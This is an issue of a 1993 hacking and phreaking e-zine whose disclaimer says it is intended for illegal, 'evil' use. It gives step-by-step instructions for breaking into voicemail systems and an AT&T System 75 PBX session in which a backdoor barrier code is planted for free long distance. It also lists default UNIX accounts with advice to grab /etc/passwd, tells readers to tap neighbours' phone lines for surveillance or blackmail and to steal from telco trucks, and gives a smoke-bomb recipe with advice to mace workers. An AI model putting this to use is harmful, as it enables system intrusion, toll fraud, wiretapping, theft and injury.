______ ______ ____________ ____ ___ ______ / ____|\ / \ |____ ____|\ / | \ / / | / \ / / ____\| / __ |\ \_/ /|_____\| / | / / / / __ |\ / / / / /__/ / | / / / / /| |/ / / / /__/ / | / /__/______ | / / / / / / / | / / | / / |____________|\ |\_____ / / /__ / / /___/ / |___/ / |\_____ / / |_____________\| \|____| / |___| / |___ |/ |___|/ \|____| / ____ / \ --- / \ \ __ / /\ \ \ \ _/______|_/ / / / \ | | / / / / | ---\( |/ / / / | \|\(/\(/ \(/ | | / / / \ / / \ ___/ / / / Communications of The New Order Issue #1 Summer, 1993 "The best things in life are toll-free." AT&T Editor......................................DeadKat Cheerleader.................................Karb0n Rebel without a pause.......................Panther Modern Fund raiser.................................Cavalier The K-radiest...............................Jewish Lightning Flatline engineer...........................Nuklear Phusion Thanks to: Phreddy!, god, Control-C (the new one), Nitro-187, RDT (you guys rule), VirtualCon (NOT!), Lucifer and the Coders, Disk Jockey, Visionary, Kamikaze, John Falcon, Cosmos, Pee Wee, and all the negligent system administrators of the world... ========= ___/\/INTRoDUCTIoN\/\___ Welcome to CoTNo! This publication is the prodigy of The New Order, Colorado's best hacking group. We have created this 'zine to help teach what we have learned and discovered from our combined years of experience. This is not intended to be an ultra-technical collection of barely useful information, but rather a forum for spreading current H/P/A knowledge and practices to the newer members of the 'scene'. You will not find mind-numbing overly technical reports here. Nor will you be wasting your time and hard-drive by downloading useless articals on non-H/P/A topics like gambling and car theft. All articals contained in CoTNo have useful applications in today's heavily computerized and automated society. Some well experienced hackers may find these texts to be old hat, but we feel the scene has been dying because of a lack of basic hacking tutorials. The goal of the writers of this publication and the members of TNo is to educate and enlighten in order to recreate the booming scene of the 80's. The New Order (TNo) are the main writers and supporters of this 'zine. We are composed of hackers, phreakers, and "hairy-eyed anarchists" from the Colorado area. We recently recieved some minor publicity in a comment found in The Seed Magazine: Denver's Rag of Underground Culture. The following is an exerpt from the June/July '93 issue: "Hackers - no longer a small underground phenomenon, these computer whiz- kids have become a highly organized network of post-modern renegades. With everything in our lives being computerised, today's hackers are able to gain unbelievable access into just about everything. They communicate to each other via BBS (Bulletin Board System) and trade tips on everything from music to ripping off the phone company. The buzz around town is about Flatline, a BBS run by the hacking crew, TNO." Not exactly the front page of Time, but at least this was a POSITIVE statement by the media on the hacking phenomenon. We accept submissions to CoTNo from anyone who has willingness to teach and can get on Flatline. There will also be a CoTNo mailing address soon. This mag' will be published on a quarterly basis. DISCLAIMER ~~~~~~~~~~ This publication contains information pertaining to illegal acts. The use of this information is intended solely for evil purposes. The editors, writers, and publishers of this publication take no responsibility for any legal acts committed using this information. If you plan on using this information for destructive purposes, read on. Otherwise...FUCK OFF! TABLE OF CONTENTS ~~~~~~~~~~~~~~~~~ 1. CoTNo Introduction.......................................DeadKat 2. How to Hack Audix VMB's..................................DeadKat 3. System 75 Hacking (An Online Tutorial)...................Panther Modern 4. UNiX Default List........................................TNO Hacking Crew 5. HoW To MAiL FoR FREE.....................................Karb0n 6. How to Red Box...........................................DeadKat 7. Field Phreaking I........................................The Third Cartel 8. Field Phreaking II.......................................The Third Cartel 9. How to Make a ZAPPER GUN.................................Panther Modern 10. Comments on Phrack 42....................................Karb0n 11. CoTNo Conclusion.........................................DeadKat ========= (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\ (*) (*)\| (*) HOW TO HACK (*)\| (*) AUDIX (*)\| (*) VMB'S (*)\| (*) (*)\| (*) By (*)\| (*) |>ead | Occasionally 1111 / Once you figure out the default password for one empty box, you can access all the boxes you found during your scan by using the default. WHAT TO DO ONCE YOU'RE IN ------------------------- You will know when you have broken into a box when you hear a message like "Extension XXX, you have no new messages." You can now set up your personal box. The following is a list of the functions available to you: KEY FUNCTION --- -------- 1 Create a message. 2 Retrieve messages left for you. 3 Change your greeting. 4 Check out messages left by you. 5 Change password. 6 Change call notification information. **R Relog into your box. **N Enter the directory. The first thing you should do is change your password! You don't want anybody to hack YOUR box. ADVANCED AUDIX -------------- Sometimes you will find boxes that have no name, but don't have a default. Transfer to the box and check it out. It might be a carrier. Audix's are usually found on System 75/85 PBX's which can be accessed via modem. Call it with your modem and if you get a prompt that looks like Logon: you have scored big. A tutorial on hacking System 75/85's can be found elswhere in this 'zine. If you transfer to the box and you hear a quick beep without hearing any type of greeting, you have found a bridge. Have a friend call the system and transfer to the same box after you have and see if you can talk to each other. All System 75/85's have the capability to bridge extensions but this option is rarely used. If you find a bridge, only call it late at night so you don't stumble into valid conference. CONCLUSION ---------- You should be a master at hacking Audix VMB's now. You can use many similar techniques on other brands of VMB's too. Be conservative with your boxes. The more boxes you snag from one company, the more likely they will notice you and shut you out. If you do end up with 500 boxes, use them to trade with. You can get better access on boards, money, or equipment for them. Have Phun! __________________________________________________________________________ (C)opywrong 1993, DeadKat Inc. All wrongs denied. ========= /\/System 75 hacking\/\ /\/An online tutorial\/\ -=Captured from a very generous company located in Denver=- -=My thanks go out to them for use of their PBX=- --Intro by Panther Modern TNO/TBF-- --Hacking of the system by Panther Modern TNO/TBF-- --Editing and revising from |>ead|Special thanks to Dead Kat for teaching me how to do this stuff..< INTRO ~~~~~ System 75/85's..The gateway to the world of the PBX...If one can hack these machines, one has the ability to generate many codes for himself, and his fellow phreakers/hackers to use and enjoy. Hacking these machines can be very fun, but if one does not know what he's doing, it could be frustrating and potentially risky. That's why I am writing this text. This file includes captures from two hacks I did. In the first hack, I will show you how I went thru, saw that the company did not have a PBX, and made my own for my own personal gateway to free LD. In the second hack you will see how I simply looked, saw the PBX, and quickly found the correct trunk, changing nothing. Version 2 is definately the better way to hack a system. If you change things, it will show up on the system log. Along comes a system administrator to read the log, and yer busted. But if you don't change anything, no one will ever know you were there...Of course, many times, it becomes nescessary to change things, if the company dosn't already have a PBX installed...You must make your own. For ease of reading, I have gone thru and edited/commented on everything I did in both hacks. Hopefully I made it easy to understand..Good luck hacking System 75! CONVENTIONS USED IN THIS ARTICAL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. The command prompt is enter command: 2. Resulting screens begin and end with dashes. 3. Comments are inclosed by brackets. [ ] 4. Emulation is Bell 513. THE FIRST HACK ~~~~~~~~~~~~~~ CARRIER 1200 [1200 baud is a good way to recognise a sys75] KEYBOARD LOCKED, WAIT FOR LOGIN Login: XXXXX Password: XXXXXXX [I don't want to include any passwords in this file] Terminal Type (513, 4410, 4425): [513] [513 is a default bell prefix. It is about the same as VT100] ___________________________________________________________________________ Copyright (c) 1986 - AT&T Unpublished & Not for Publication All Rights Reserved ___________________________________________________________________________ [I like this screen...] enter command: display rem<< [All you really need is DIS, not display. Try DIS HELP, also, LIST HELP] ____________________________________________________________________________ display remote-access Page 1 of 1 REMOTE ACCESS Remote Access Extension: Barrier Code Length: 4 BARRIER CODE ASSIGNMENTS (Enter up to 10) Barrier Code COR Barrier Code COR 1: 1 6: 1 2: 1 7: 1 3: 1 8: 1 4: 1 9: 1 5: 1 10: 1 ____________________________________________________________________________ [As you can see, no remote access ports are set up. No PBX, and no codes. Code length is four digits.] enter command: dis trunk 1 [we will now look at all 99 trunks, to find the rite one to use..] _____________________________________________________________________________ display trunk-group 1 Page 1 of 5 TRUNK GROUP Group Number: 1 Group Type: co SMDR Reports? y Group Name: main pool COR: 1 TAC: 76 Direction: two-way Outgoing Display? n Data Restriction? n Dial Access? y Busy Threshold: 60 Night Service: Queue Length: 0 Incoming Destination: 200 Comm Type: voice Digit Absorption List: Prefix-1? n Restriction: toll Allowed Calls List? n TRUNK PARAMETERS Trunk Type: loop-start Outgoing Dial Type: tone Trunk Termination: rc Disconnect Timing(msec): 500 ACA Assignment? n Maintenance Tests? y Answer Supervision Timeout: Suppress # Outpulsing? n _____________________________________________________________________________ [First we look at night service, and incoming destination, recording the numbers to hardcopy. We also note the trunk type, and COR number] [We type [U to get to the next page of text.] _____________________________________________________________________________ display trunk-group 1 Page 2 of 5 TRUNK GROUP GROUP MEMBER ASSIGNMENTS Port Name Mode Type Answer Delay 1: A0301 xxxxxxx 2: A0302 xxxxxxx 3: A0303 xxxxxxx 4: A0304 xxxxxxx 5: A0305 xxxxxxx 6: A0306 xxxxxxx 7: A0307 xxxxxxx 8: A0308 xxxxxxx 9: A0401 xxxxxxx 10: A0402 xxxxxxx 11: A0403 xxxxxxx 12: A0404 xxxxxxx 13: A0405 xxxxxxx 14: A0406 xxxxxxx 15: A0407 xxxxxxx ____________________________________________________________________________ [Where name is, there will be fone numbers. Record these so you will know what number to dial in to while hacking. I have removed the numbers for security reasons.] [Same process was done on the remaining trunks. Always scan all 99, even if you stop finding some. There may be a good one...] [If the trunk has both a night extension and a phone number listed on page 2, make a note of it. Use the command dis cor to see the the trunks restrictions. FRL should equal 7. If not, change it to 7 or find another trunk.] [BTW - When done looking thru pages, type Ow to return to prompt] [What we found was a trunk which looked as if it was fairly unimportant. Also, it didn't have a night extension. This is important, because we want to set up an after-hours PBX. If we take over a daytime extension, the PBX would most likely go down within 24 hours.] [If, under the name column, there are strange numbers, like AT204, just disregard them, and go on to the next trunk, these are internal extension numbers.] enter command: dis dial<< [This displays the dial plan for the system. It will show you which digit to start your remote extension (shown later) with. Use a digit that says EXTENSION. As you can see, that digit here is 2.] ____________________________________________________________________________ display dialplan Page 1 of 1 DIAL PLAN RECORD Area Code: XXX ARS Prefix 1 Required? y Uniform Dialing Plan? n FIRST DIGIT TABLE Digit Identification Number of Digit Identification Number of Digits Digits 1: fac 3 7: tac 2 2: extension 3 8: tac 1 3: 0 9: fac 1 4: 0 0: attendant 1 5: 0 *: fac 2 6: tac 2 #: fac 2 _____________________________________________________________________________ enter command: dis allow [This will display the allowed calls/area codes. If your PBX does not work later on, check here, and try to add the correct area code you want to call] ___________________________________________________________________________ display allowed-calls Page 1 of 1 ALLOWED CALLS LIST (FOR TOLL RESTRICTION) AREA/LONG DISTANCE CARRIER CODES ( Enter up to 10 ) 1: 800 6: 2: 911 7: 3: 950 8: 4: 9: 5: 10: ____________________________________________________________________________ [This system can call 800's, 950's, 911, as well as long distance numbers.] enter command: list help ____________________________________________________________________________ Please enter one of the following object command words: abbreviated-dialing groups-of-extension personal-CO-line aca-parameters hunt-group pickup-group bridged-extensions intercom-group station configuration measurements term-ext-group coverage modem-pool trunk-group data-module performance Or press CANCEL to cancel the command Object command word omitted; please press HELP ____________________________________________________________________________ [List is similar to DIS, except that none of it's factors can be changed.] enter command: list groups-of-extension 200 [We are attempting to find an empty extension to set up the remote on. Find an extention that is not being used and write it down. The screens have been omitted for brevity's sake.] [We will now set up a remote extension.] enter command: list group 299< list groups-of-extension 299 Extension not assigned [We first found an empty extension] enter command: ch rem< [we proceeded to add it to the remote access. I will put {'s around what we added.] ____________________________________________________________________________ change remote-access Page 1 of 1 REMOTE ACCESS Remote Access Extension: {299} Barrier Code Length: 4 BARRIER CODE ASSIGNMENTS (Enter up to 10) Barrier Code COR Barrier Code COR 1: {3323} 1 6: 1 2: 1 7: 1 3: 1 8: 1 4: 1 9: 1 5: 1 10: 1 Command successfully completed _____________________________________________________________________________ [We added in our code, and our remote access extension, and then save by typing SB ] [We added our extension, and our code (barrier code)] enter command: dis trunk 9<< [We looked back on our hardcopy notes, and decided that trunk 9 would be appropriate to add our code to. We re-display just to make sure] ____________________________________________________________________________ display trunk-group 9 Page 1 of 5 TRUNK GROUP Group Number: 9 Group Type: co SMDR Reports? y Group Name: fax wild line COR: 1 TAC: 79 Direction: two-way Outgoing Display? n Data Restriction? n Dial Access? y Busy Threshold: 60 Night Service: Queue Length: 0 Incoming Destination: 267 Comm Type: voice Digit Absorption List: Prefix-1? n Restriction: code TRUNK PARAMETERS Trunk Type: loop-start Outgoing Dial Type: tone Trunk Termination: rc Disconnect Timing(msec): 500 ACA Assignment? n Maintenance Tests? y Answer Supervision Timeout: Suppress # Outpulsing? < display trunk-group 9 Command aborted ____________________________________________________________________________ enter command: ch trunk 9 [Once again, changes I made will be in {'s] ____________________________________________________________________________ change trunk-group 9 Page 1 of 5 TRUNK GROUP Group Number: 9 Group Type: co SMDR Reports? y Group Name: fax wild line COR: 1 TAC: 79 Direction: two-way Outgoing Display? n Data Restriction? n Dial Access? y Busy Threshold: 60 Night Service: {299} Queue Length: 0 Incoming Destination: 267 Comm Type: voice Digit Absorption List: Prefix-1? n Restriction: code TRUNK PARAMETERS Trunk Type: loop-start Outgoing Dial Type: tone Trunk Termination: rc Disconnect Timing(msec): 500 ACA Assignment? n Maintenance Tests? y Answer Supervision Timeout: Suppress # Outpulsing? n Command successfully completed ____________________________________________________________________________ [All we had to do was add our remote extension to Night Service] [..And save it with SB ] [You should now have a ready-to-use PBX!!!!!! Check page 2, that's yer after hours dial in number.] enter command: dis trunk 9 [We check again to make sure our changes came thru correctly] ____________________________________________________________________________ display trunk-group 9 Page 1 of 5 TRUNK GROUP Group Number: 9 Group Type: co SMDR Reports? y Group Name: fax wild line COR: 1 TAC: 79 Direction: two-way Outgoing Display? n Data Restriction? n Dial Access? y Busy Threshold: 60 Night Service: 299 Queue Length: 0 Incoming Destination: 267 Comm Type: voice Digit Absorption List: Prefix-1? n Restriction: code TRUNK PARAMETERS Trunk Type: loop-start Outgoing Dial Type: tone Trunk Termination: rc Disconnect Timing(msec): 500 ACA Assignment? n Maintenance Tests? y Answer Supervision Timeout: Suppress # Outpulsing? < display trunk-group 9 Command aborted ____________________________________________________________________________ [everything's great!] enter command: logoff [Sooooooooo.....We logoff...] [To use yer PBX, just dial in, and type: +9+1+ACN!! Or to set up an alliance, replace the 1 with a 0...] THE SECOND HACK ~~~~~~~~~~~~~~~ [I started this capture a little late, after I had already looked through a few things. It still gets the point across, tho. It displays going thru, and not changing ANYTHING!] enter command: dis rem [I look at the remote...] ____________________________________________________________________________ display remote-access Page 1 of 1 REMOTE ACCESS Remote Access Extension: 599 Barrier Code Length: 5 Authorization Code Required? n BARRIER CODE ASSIGNMENTS (Enter up to 10) Barrier Code COR COS Barrier Code COR COS 1: 52290 1 1 6: 1 1 2: 11111 1 1 7: 1 1 3: 1 1 8: 1 1 4: 1 1 9: 1 1 5: 1 1 10: 1 1 ____________________________________________________________________________ [I see that there are 2 codes and an extension already set up. I am wary of code number 2..It could be a trap code] enter command: dis trunk 7 ____________________________________________________________________________ display trunk-group 7 Page 1 of 9 TRUNK GROUP Group Number: 7 Group Type: co SMDR Reports? y Group Name: REMOTE ACCESS COR: 63 TAC: 707 Direction: two-way Outgoing Display? n Dial Access? y Busy Threshold: 10 Night Service: 599 Queue Length: 0 Incoming Destination: 0 Comm Type: voice Auth Code? n Digit Absorption List: Prefix-1? n Restriction: code Trunk Flash? n TRUNK PARAMETERS Trunk Type: ground-start Outgoing Dial Type: tone Trunk Termination: rc Disconnect Timing(msec): 500 Terminal Balanced? n RA Trunk Loss: 0db Answer Supervision Timeout: 10 Receive Answer Supervision? < display trunk-group 7 Command aborted ____________________________________________________________________________ [I see that trunk 7 already has the extension ready to use!!!!!!!!] [FREE LD and no changes! They will not know I was ever there!!!] [I look at page's 2 and 3 for the fone numbers to dial in to, and then I'm OUTTA THERE!!!] enter command: logoff --I hope these captures helped.. --Panther Modern TNO/TBF ========= /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ *| The TNO Hacking Crew Presents |* *| |* *| UNiX Defaults |* \ / ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ INTRO ~~~~~ This a list compiled by the members of The New Order from frequent visits to UNiX hosts. These are default accounts/passwords observed in hosts running UNiX variations including System V, BSD, Xenix, and AiX. These defaults are included in standard setup on various machines so the Sysadmin can log on for the first time. Often the negligent Sysadmin forgets to delete or pass- word the accounts. This makes UNiX machines extremely easy to infiltrate. This artical does not go into specifics of hacking but it is highly suggested that you immediately copy the /etc/passwd file (/etc/security/ passwd in AiX machines!) so you can later run a dictionary hacker and get some other accounts and insure your access. This is list of default accounts which are often unpassworded. If the system asks for a password, try the account name which sometimes works. DEFAULTS ~~~~~~~~ root bin adm makefsys sysadm sys mountfsys rje sync umountfsys tty nobody checkfsys somebody setup lp powerdown ingres dptp general guest daemon gsa user trouble games help nuucp public unix uucp test admin student standard pub field demo batch visitor listen network uuhelp usenet sysinfo cron console sysbin who root2 startup shutdown ncrm new CONCLUSION ~~~~~~~~~~ Have phun but be careful! Learn what to do before you run out and invade some systems. These won't do you any good if you can't hide your tracks. Hacking is all about learning about cool stuff, but you can't hack until you learn how. Njoy. ========= HoW To MAiL FoR FREE BY KARB0N -=TNO=- Postal chislers used to mail letters unstamped in the knowledge that they would be delivered anyway... with "Postage Due"to the recipient. It took a stingy person to mail personal letters this way, but many people did send mail this way on bill payments. So the Post Office changed it's policy. It stopped delivering letters without stamps. But a letter with a stamp.. even a one cent stamp...is delivered postage due if need be. A letter with no stamp is returned to the sender. Naturally, this has just opened up a new way pf cheating. Letters can now be mailed for free by switching the positions of the delivery address and the return address. If there is no stamp on the envelope, it will be Returned to the address in the upper left corner.. which is where you want it to go in the first place. Unlike the old system, the letter is not postage-due. At most the recipient gets a stamped purple reminder that "The Post Office does not deliver mail without postage." At least one large company seems to have adapted this principle to it's billing. Citibank bases it's MasterCard operations in Sioux Falls, South Dakota. The bill payment envelopes have the Citibank Sioux Falls address in both the delivery address and return address positions. (Most bill payments envelopes have three lines for the customer to write in his or her return address.) Therefore, regardless of whether the customer puts a stamp on the envelope, it is delivered to Citibank. (The return-address gimmick works even when the return address is in a different state from the mailing point.) Who is cheating whom? If the customer puts correct postage on the envelope, it is delivered to Sioux Falls at the customer's expense. No one is slighted. If, on the other hand, the customer intentionally omits the stamp, the payment is delivered at Post Office expense. Then the customer has cheated the Post Office. The Post Office also loses out if the customer honestly forgets to put a stamp on the envelope. But then blame ought to be shared with the peculiar design of Citibank's envelope. Citibank's motive is plain: If the envelopes are returned to forgetful customers, it delays payment. ========= (*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)\ (*) (*)\| (*) |>ead|========= (Editor's note: The following two file are the best files I have ever read on field phreaking. They were written by Denver Hacker's a few years ago. Since they were not widely distributed I have included them here for your information. Unfortunately we were not able to contact the original authors to get permission to reprint them. As far as we know, The Third Cartel is defunct. If any previous members of the group read this publication, we ask that they get in contact with us at Flatline.) -/\-/*\-/\-/*\-/\- The Third Cartel -\/-\*/-\/-\*/-\/- Presents: Field Phreaking I -=-=-=-=-=-=-=-=-=- June, 1988 Introduction: The purpose of this manuscript is to introduce useful phreaking ------------- techniques. These techniques have been developed by the Third Cartel and have proved to be convenient and reliable. Field Phreaking Kit: ==================== The Field Phreaking Kit is a neccessity for the serious phreaker. Some so-called phreaks get all of their information including codes from BBSs and have an ego big enough to call themselves phreaks. The real phreak acquires knowledge on his own through perseverence and ingenuity. Following is a list of useful items for your Phreaking Kit: o Backpack: Get one: Very Handy. We'll tell you how to get one or make one. o Ratchet Set: Usually, you'll only need 7/16 and 3/8" size ratchets. o Screwdrivers: Get medium and large screwdrivers, and a phillips head. o Wire Cutters: Just in case you want to wipe out some lines. o Pliers: For misc. stuff. o Xacto or Pocket Knife: To strip or cut wires. o Penlight: Nice and small; very useful for night work. o Flashlight: If you need lots of light and have enough room in your pack. o Gloves: Make sure you don't get shocked or leave your fingerprints around. o Pencil and Paper: Write down locations, notes, numbers, etc. ------------------------------------------------------------------------------ The Third Cartel carries the following optional materials in their Field Kit: ------------------------------------------------------------------------------- o Walki-Talkies: For communications when yelling isn't possible or smart. o Battery Operated Camara Flash: Good for flashing in someone's eyes at night Will blind a telco guy for a few seconds. o Mace/Dog Repellant: Spray in someone's eyes if they give you trouble. o Smoke Bomb: Helpful to divert attention or scare. [drop in telco car] [Mix 3 parts potassium nitrate with 2 parts sugar and melt] o Matches: For smoke bomb or anything that is flammable. o Bandana/Surgical Mask: Manholes are dusty; Wear these for easier breathing. o Marker: Mark your "territory" on phone boxes. o Fake Telco ID Card: Will make some people think that you work for telco. Organize your kit so you know where everything is and can get something quickly when needed. You don't want to be fumbling for your mace when the gestapo is about to get you. Test Phone: =========== The Test Phone is the most useful piece of equipment for Field Phreaking. You can try to sneak into a telco Plant Department [truckyard] and get a real test phone out of a truck like we did. If you'd rather not do this, don't worry; making your own test phone is ultra-easy. First, get a telephone for your own purposes. Find the wire coming out of the phone that is supposed to go to the wall's modular jack. It should be at least three feet long for convienience. Cut off the modular jack at the end of the wire. Strip the wire, and there should be two or four small wires inside. Hook the two middle wires to alligator clips [preferably insulated]. You now have a test phone! Very easy, indeed. Now let's see if you hooked everything up ok. First find your phone box. It'll probably be on the outside of your house. It's farly small, and you might need the ratchet to open it up. Once you get it open, you should see some screws. These are the terminals for your phone line. Hook the alligator clips to the two top terminals. If your phone is ok, you should get a dial tone. Once you know that your phone is working, a whole new world opens up to you! You can hook the phone up to your neighbor's terminal and call long distance or yell at the operator on their line. Be careful, though. You don't want to be talking to Sue in L.A. when your neighbors are home and awake. If they pick up the phone when you're already on, you could get into serious trouble. Of course, you could always listen in on them! If you want, you can hook wires up to your neighbor's terminal and lead them to your house. In case you didn't know, this is called Beige Boxing. You can then hack computers on their line, call Dial-A-Prayer, etc. Make sure to hide the wire well so that it won't be traced to your house! Manholes: ========= One way to get access to an abundance of phone lines is by getting into telco manholes. You don't want to accidentally get in a sewer manhole, so the first thing to do is find the differences between sewer and telephone manholes. If you have trouble with this, here's a few tips that might help: o Telco manhole covers are usually larger and heavier than other covers. o Telco manholes are scarce compared to sewer manholes. So if there are a lot of checkered manhole covers in your area, those are probably sewer manholes. If there are only a handful of unmarked manhole covers in your area, those probably contain phone lines. o Go to your local telco Central Office [CO] and find out what the manhole covers look like there. Find manhole covers that look the same in other areas, and pick a convenient/safe manhole to explore. Getting into a manhole is a different story. Here in the Denver area, it takes at least three people to get a manhole cover off. Hopefully it'll be easier to do in your area. To open the manhole, you'll probably need at least two crowbars [You could try using a pickaxe]. Get a group together to open the manhole, using 2 or more people with crowbars to slide the cover off. You might want to get a strong guy to push the manhole cover while the other people with crowbars support it. If you know of a tool that was made specifically for opening manholes, we'd appreciate it if you contacted us on some local Denver boards and told us about it. Likewise, if you have a better system for opening manholes, we'd be grateful for the information. Once you get the manhole cover off, shine a flahlight down to see if there's a ladder going to the bottom. Try a different manhole if there's no ladder. If you want to go down a manhole, don't forget to wear a bandana or surgical mask over your mouth so that you don't choke on dust. Also bring a flashlight so you can see what you're doing. Many times, there'll be a few inches of water at the bottom, so you might also want to wear boots. Down in the manhole, you might find some equipment or manuals. Go ahead and take them if you want; you deserve it! There should be some very large ABS. The phone lines are inside these tubes. Attached to this tubing there will be some short, wide plastic cylinders. There'll be screws holding these cylinders on to the tubing. You'll need either a screwdriver or a ratchet to open a cylinder. If you happen to get a cylinder open, congratulations! You now have access to countless phone lines! We'll leave it to you to figure out what to do with all of those wires. Surely you'll figure something out! [snip, snip!] Exploring Telco Building Sites: =============================== One of the best ways to get information about telco is by going to a Central Office near you, exploring the trucks in a Plant Department, or "visiting" other telco buildings. The phone company is careless in many ways. They leave important, yet unshredded documents and computer printouts in their open dumpsters. Their cars, vans, and repair vehicles are almost always left unlocked. Inside their vehicles one can usually find manuals, test phones, computer cards [usually for mainframes, almost never for personal comuters], nice tool sets, etc.! It's almost as if they *want* to be ripped off! They deserve bad treatment just for their negligence. If possible, we like to be courteous to individual employees of telco. Most employees are fairly amiable and don't deserve trouble. It's the beuracracy of telco that deserves to be manhandled. Cheap practices such as monopolizing and the overpricing of services is the general reason why we phreaks do what we do with such determination. On with the show. Exploring Dumpters: Looking inside telco dumpters is probably the easiest way to acquire useful information. Typycally, dumpters will be found outside a Central Office. -/\-/*\-/\-/*\-/\- The Third Cartel -\/-\*/-\/-\*/-\/- Presents: Field Phreaking II -=-=-=-=-=-=-=-=-=- July, 1988 Introduction: The purpose of this manuscript techniques have been developed by the Third Cartel and have proved to be convenient and reliable. This manuscript is a continuation of Manuscript II: Field Phreaking. Pay Phone Hacking: ================== The safest way to get phreaking codes is by hacking them on a pay phone. The chances of getting caught are extremely remote, especially if you switch pay phones every few minutes. One problem with hacking codes is that when you find a code by dialing it randomly, you often forget what code you dialed. To prevent this, we print out a sheet filled with 6-8 digit random codes on the computer. Then we start testing each of these codes off of a 950 number. This works great, especially since 950s are not charged! Cross off each code on the paper that doesn't work, and mark the ones that do work. This technique takes a lot of patience, but it's worth it if you have a terrible short-term memory. Telco Boxes: ============ This is our prime focus in Manuscript III. Every field phreaker worth his weight in dung should at least know the basics about phone boxes. There are so many different types that we can only cover the major groups. But once you learn about a few boxes, it'll be easy to learn about others. Be sure to bring a test phone with you [see Manuscript II] so you can connect up to phone lines. Small Boxes: Small telephone boxes typically contain 1 to 20 different phone ------------ lines. They are usually in convenient and safe locations. They are easy to open, and can be closed quickly. Home Boxes: Unless you live in an apartment complex, your home box shoud be very easy to locate. It is small box located on the side of your house; usually a foot or two of the ground. Many times it will be beige colored and may require a ratchet [Usually 3/8"] to open. If you have more than one line in your house, your box will probably be fairly large and light gray. You'll need a ratchet and a screwdriver to open a two-line box. In the one-line box there will be five terminals or screws. The top two screws should have red and green wires leading to them. If you connect your test phone clips to these screws, you'll be on the line. Usually, the two screws below contain the same phone line. The very bottom screw, in the middle, is the ground. In the two-line boxes, you should be able to figure out how to hook up to the lines rather easily. They even have a modular plug jack that you can plug a normal phone into. There are also several terminals that you can hook the clips up to. Aluminum Multi-Line Boxes: These boxes are usually found behind business buildings and shopping centers. Some condominium complexes also have these boxes hooked up to walls on a few units. Each box contains five or more phone lines. The boxes are rectangular and made of aluminum, are very easy to open and close, and often say "Western Electric" on the front. Once you get the box open, you will see several pairs of terminals grouped diagonally. Simply attach your phone clips to a correct pair, and you'll be on a phone line. Run an ANI on the phone line to find its number. If your phone happens to be polarity sensitive, and you get no dial tone when hooked up to terminals, reverse the alligator clips and you'll be on the line. Small Distribution Boxes: These boxes, usually either light green, or a very dark green, are not very common, and can be found behind shopping centers, houses, and other buildings. You'll probably need the ratchet to open it, and a knife to strip some wires. The top of the box pulls off if you loosen the screws enough. Inside, there will be several wires. Two different sizes of wires are found in distribution boxes. The larger wires lead to nearby buildings. The smaller wires lead to another distribution box where they are spliced yn. These boxes take the most time to use because they have no terminals and you have to find the correct wire pairs. It's easiest to find the large wire pairs, so start out with those. Once you find a phone line, you might want to tape together or label the wire pair for future reference. Use the same procedure for the smaller wires. If you find a good box, and are willing to take the time, these boxes can be very worthwhile! Medium Boxes: Medium boxes carry more lines than small boxes but are usually ------------- found in somewhat risky locations. Most of them require a ratchet for access, and they usually open on a hinged door. Medium Distribution Boxes: These are identical to the small distribution boxes, but carry far more phone lines. Many times, after taking off the cover, there will be a flat access plate you can open with a ratchet. Use the same procedure for this box as outlined in the small distribution box description. Flat Peg Boxes: Flat Peg boxes are frequently found behind grocery stores, shopettes, and other businesses. Sometimes they can be found in an office phone room or in the back halls of shopping malls. They are typically big, square boxes mounted to a wall and are opened by a handle on a hinged door. Sometimes, they are mounted away from a building. We've seen some that are double sided and require a ratchet to open. Inside, the terminals will be grouped in approx. 10 X 3 inch columns. The terminals are long flat pegs. There are four terminals per row. It is sometimes difficult to hook up to a line since the terminals are so close together, but you'll get the hang of it after a few tries. Large Boxes: These boxes sometimes contain hundreds of phone lines. They are ------------ found along busy streets and in business areas or apartment complexes. You'll need a ratchet to open one. Wire Box: The wire box is about three feet tall and has two doors opened by one latch. The wires lead into long, plastic, rectangular grouping stations. There should be a tool attached by two screws to the side of a door. Connect your phone clips to these screws. Now connect the tool to a plastic grouping station. If you connect the tool correctly, you will be on a line. The bes contained in a single grouping station. Terminal Boxes: In our opinion, the terminal box is the king of boxes. A single box may contain up to eight hundred lines. You can't miss these boxes because of their size. They stand at least four feet tall and have the characteristic light green color of most boxes. After opening a box, you will see many red and white numbered terminals pairs on each side. On the inside of each door, there are two screws to connect your test phone to. Leading out from the screws is a double current alligator clip that can easily connect to any pair of terminals. This easy connection tool makes this the most convenient box to use, and the most profitable. Helpful Tips: Now that you know how most major boxes work, you'll be able to ------------- figure out how other boxes work. By now we're sure you have thought of some interesting things to do with boxes. Here are some tips you might find helpful. The Perfect Box: The most tedious step in field phreaking is finding "The Perfect Box." This box should be located away from streets and hidden from the view of homes. When working on this box, there should be no worry of being caught or observed. Finding this box might take quite a while, but don't give up hope; it's well worth the time and effort. Try looking around waterways such as creeks, lakes, and ditches. If you have easy access to wilderness areas, such as the mountains, try looking for Perfect Boxes around there. Beige Boxing: We're not sure exactly who invented the beige box, but it can be extremely useful for surveillance and blackmail purposes. The only materials you need for a beige box are two wires and your test phone. Connect the wires to the ring and tip of the line you want to tap. Make sure your wires are hidden, and lead them to your house or other location. You then can connect your phone to the wires and listen in on conversations or use their phone line however you want. Make sure that you don't use a boxed line when the victim is likely to pick up his phone and hear you. Safety Tips: o Well, first of all, be extremely careful when choosing a box to work on. Two of us got arrested for using the wrong box at the wrong time. Make sure that nobody will see you when you're working on it, because you're putting your record at risk. Of course, if you're under 18, you don't have to worry quite as much, but going to court is not K-Rad. o Try wearing gloves when working on phone lines. You don't want to get shocked or leave fingerprints around. o If you ever open a box that has huge cables in it, it's probably a power box. The power box is usually dark green and stands a few feet in height. Don't even think of messing with one unless you want to risk having a painful death. If you absolutely *must* disconnect someone's power, then use *EXTREME* caution when disconnecting the cable. Wear heavy duty gloves, make sure that you aren't wet, and don't use metal tools. o Always look for your boxes at day, and work on them at night. o Have a getaway bike or car ready in case of an emergency. o If anyone catches you, act cool and calm. You don't want to say "uh, well, umm...well I was just uh...," because that makes you look suspicious. *Always* have a story ready *before* you start opening boxes! This has saved us a couple of times. o You might want to incorporate your fake I.D. card into the scheme so people think that you work for the phone company. Remember, this won't work on telco employees. Only attempt to fool average citizens. If they call the cops or telco, take off. This concludes Manuscript III. We described most of the major phone boxes so 